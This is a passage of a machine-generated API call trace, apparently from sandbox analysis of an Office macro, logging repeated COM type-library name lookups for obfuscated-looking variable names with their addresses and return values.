returned 15 [0069.000] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.000] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kBAUxQA", lHashVal=0x10fad4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.000] IUnknown:Release (This=0x665ba50) returned 0xd [0069.000] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.000] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kBAUxQA", lHashVal=0x10fad4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.000] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.000] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.000] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kBAUxQA", lHashVal=0x10fad4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.000] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.000] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.000] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kBAUxQA", lHashVal=0x10fad4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.000] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.000] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.000] IUnknown:Release (This=0x665ba50) returned 0xd [0069.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1088e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_kBAUxQA") returned 15 [0069.000] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kBAUxQA", lHashVal=0x10fad4, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x78005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x78005500000000, pDummy=0x0) returned 0x0 [0069.000] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61cc2 | out: _Dst=0x144ec0) returned 0x0 [0069.000] ITypeComp:RemoteBind (in: This=0x665ba60, szName="BAAxDx", lHashVal=0x10e8ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61cea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="BAAxDx") returned 7 [0069.000] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="BAAxDx", lHashVal=0x10e8ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61cea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="BAAxDx") returned 7 [0069.000] ITypeComp:RemoteBind (in: This=0x665bd30, szName="BAAxDx", lHashVal=0x10e8ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.001] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BAAxDx") returned 0x10e8ac [0069.001] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="BAAxDx" | out: _Dst="BAAxDx") returned 0x0 [0069.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="BAAxDx") returned 7 [0069.001] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.001] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="BAAxDx", lHashVal=0x10e8ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.001] IUnknown:Release (This=0x665ba50) returned 0xd [0069.001] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.001] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="BAAxDx", lHashVal=0x10e8ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.001] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.001] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.001] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="BAAxDx", lHashVal=0x10e8ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.001] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.001] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.001] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="BAAxDx", lHashVal=0x10e8ac, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.001] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61cea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="BAAxDx") returned 7 [0069.001] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="BAAxDx", lHashVal=0x10e8ac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.001] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.001] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61cea | out: _Dst=0x67c2d40) returned 0x0 [0069.001] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BAAxDx") returned 0x106316 [0069.001] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_BAAxDx" | out: _Dst="_B_var_BAAxDx") returned 0x0 [0069.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_BAAxDx") returned 14 [0069.002] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.002] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_BAAxDx", lHashVal=0x106316, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.002] IUnknown:Release (This=0x665ba50) returned 0xd [0069.002] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.002] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_BAAxDx", lHashVal=0x106316, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.002] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.002] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.002] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_BAAxDx", lHashVal=0x106316, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.002] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.002] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.002] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_BAAxDx", lHashVal=0x106316, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.002] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.002] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.002] IUnknown:Release (This=0x665ba50) returned 0xd [0069.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b108be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_BAAxDx") returned 14 [0069.002] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_BAAxDx", lHashVal=0x106316, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x44007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x44007800000000, pDummy=0x0) returned 0x0 [0069.002] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61cea | out: _Dst=0x144ec0) returned 0x0 [0069.002] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UDDCAAQA", lHashVal=0x1094ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d12, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UDDCAAQA") returned 9 [0069.002] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UDDCAAQA", lHashVal=0x1094ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d12, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UDDCAAQA") returned 9 [0069.002] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UDDCAAQA", lHashVal=0x1094ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UDDCAAQA") returned 0x1094ae [0069.003] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="UDDCAAQA" | out: _Dst="UDDCAAQA") returned 0x0 [0069.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="UDDCAAQA") returned 9 [0069.003] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.003] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UDDCAAQA", lHashVal=0x1094ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.003] IUnknown:Release (This=0x665ba50) returned 0xd [0069.003] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.003] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UDDCAAQA", lHashVal=0x1094ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.003] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.003] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.003] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UDDCAAQA", lHashVal=0x1094ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.003] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.003] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.003] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UDDCAAQA", lHashVal=0x1094ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.003] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d12, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UDDCAAQA") returned 9 [0069.003] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UDDCAAQA", lHashVal=0x1094ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.003] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x10000*=0x0) returned 0xaf1b5b0 [0069.003] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.003] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61d12 | out: _Dst=0x67c2d40) returned 0x0 [0069.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UDDCAAQA") returned 0x106c37 [0069.003] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_UDDCAAQA" | out: _Dst="_B_var_UDDCAAQA") returned 0x0 [0069.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_UDDCAAQA") returned 16 [0069.003] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.003] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UDDCAAQA", lHashVal=0x106c37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.003] IUnknown:Release (This=0x665ba50) returned 0xd [0069.003] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.003] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UDDCAAQA", lHashVal=0x106c37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.003] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.004] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.004] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UDDCAAQA", lHashVal=0x106c37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.004] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.004] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.004] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UDDCAAQA", lHashVal=0x106c37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.004] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.004] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.004] IUnknown:Release (This=0x665ba50) returned 0xd [0069.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b108ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_UDDCAAQA") returned 16 [0069.004] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UDDCAAQA", lHashVal=0x106c37, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0) returned 0x0 [0069.004] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61d12 | out: _Dst=0x144ec0) returned 0x0 [0069.004] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rQAA1ZAc", lHashVal=0x108859, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d6a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rQAA1ZAc") returned 9 [0069.004] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rQAA1ZAc", lHashVal=0x108859, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d6a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rQAA1ZAc") returned 9 [0069.004] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rQAA1ZAc", lHashVal=0x108859, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.004] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rQAA1ZAc") returned 0x108859 [0069.004] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="rQAA1ZAc" | out: _Dst="rQAA1ZAc") returned 0x0 [0069.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="rQAA1ZAc") returned 9 [0069.004] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.004] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rQAA1ZAc", lHashVal=0x108859, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.004] IUnknown:Release (This=0x665ba50) returned 0xd [0069.004] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.004] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rQAA1ZAc", lHashVal=0x108859, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.005] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.005] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.005] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rQAA1ZAc", lHashVal=0x108859, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.005] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.005] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.005] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rQAA1ZAc", lHashVal=0x108859, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.005] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d6a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rQAA1ZAc") returned 9 [0069.005] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rQAA1ZAc", lHashVal=0x108859, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.005] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.005] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61d6a | out: _Dst=0x67c2d40) returned 0x0 [0069.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rQAA1ZAc") returned 0x105fe2 [0069.005] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_rQAA1ZAc" | out: _Dst="_B_var_rQAA1ZAc") returned 0x0 [0069.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_rQAA1ZAc") returned 16 [0069.005] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.005] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rQAA1ZAc", lHashVal=0x105fe2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.005] IUnknown:Release (This=0x665ba50) returned 0xd [0069.005] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.005] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rQAA1ZAc", lHashVal=0x105fe2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.005] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.005] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.005] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rQAA1ZAc", lHashVal=0x105fe2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.005] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.005] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.005] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rQAA1ZAc", lHashVal=0x105fe2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.005] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.005] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.005] IUnknown:Release (This=0x665ba50) returned 0xd [0069.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1091e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_rQAA1ZAc") returned 16 [0069.006] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rQAA1ZAc", lHashVal=0x105fe2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0069.006] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61d6a | out: _Dst=0x144ec0) returned 0x0 [0069.006] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KAQ1__oA", lHashVal=0x1094da, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d3e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KAQ1__oA") returned 9 [0069.006] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KAQ1__oA", lHashVal=0x1094da, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d3e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KAQ1__oA") returned 9 [0069.006] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KAQ1__oA", lHashVal=0x1094da, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAQ1__oA") returned 0x1094da [0069.006] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="KAQ1__oA" | out: _Dst="KAQ1__oA") returned 0x0 [0069.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="KAQ1__oA") returned 9 [0069.006] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.006] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KAQ1__oA", lHashVal=0x1094da, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.006] IUnknown:Release (This=0x665ba50) returned 0xd [0069.006] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.006] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KAQ1__oA", lHashVal=0x1094da, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.006] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.006] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.006] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KAQ1__oA", lHashVal=0x1094da, 